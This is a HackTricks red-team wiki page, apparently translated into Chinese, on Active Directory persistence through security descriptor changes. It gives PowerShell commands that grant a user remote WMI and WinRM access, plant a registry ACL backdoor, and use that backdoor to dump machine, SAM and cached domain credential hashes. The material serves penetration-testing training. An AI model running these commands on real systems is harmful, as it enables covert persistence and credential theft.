Security Descriptors

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

支持HackTricks的其他方式:

安全描述符

从文档中获取:安全描述符定义语言(SDDL)定义了用于描述安全描述符的格式。SDDL使用ACE字符串来表示DACL和SACL:ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

安全描述符用于存储对象对对象权限。如果您可以对对象的安全描述符进行微小更改,则可以在无需成为特权组成员的情况下获得对该对象的非常有趣的特权。

因此,这种持久性技术基于能够获得针对特定对象所需的所有特权,以便执行通常需要管理员特权但无需成为管理员的任务。

访问WMI

您可以通过使用此方法为用户提供远程执行WMI的访问权限。

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

访问 WinRM

为用户提供对 winrm PS 控制台的访问 使用此链接:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

远程访问哈希值

访问注册表转储哈希值,使用DAMP创建一个Reg后门,这样您随时可以检索计算机的哈希值SAM和计算机中的任何缓存的AD凭据。因此,将此权限授予普通用户对域控制器计算机非常有用

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

查看Silver Tickets以了解如何使用域控制器的计算机帐户的哈希值。

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

支持HackTricks的其他方式:

最后更新于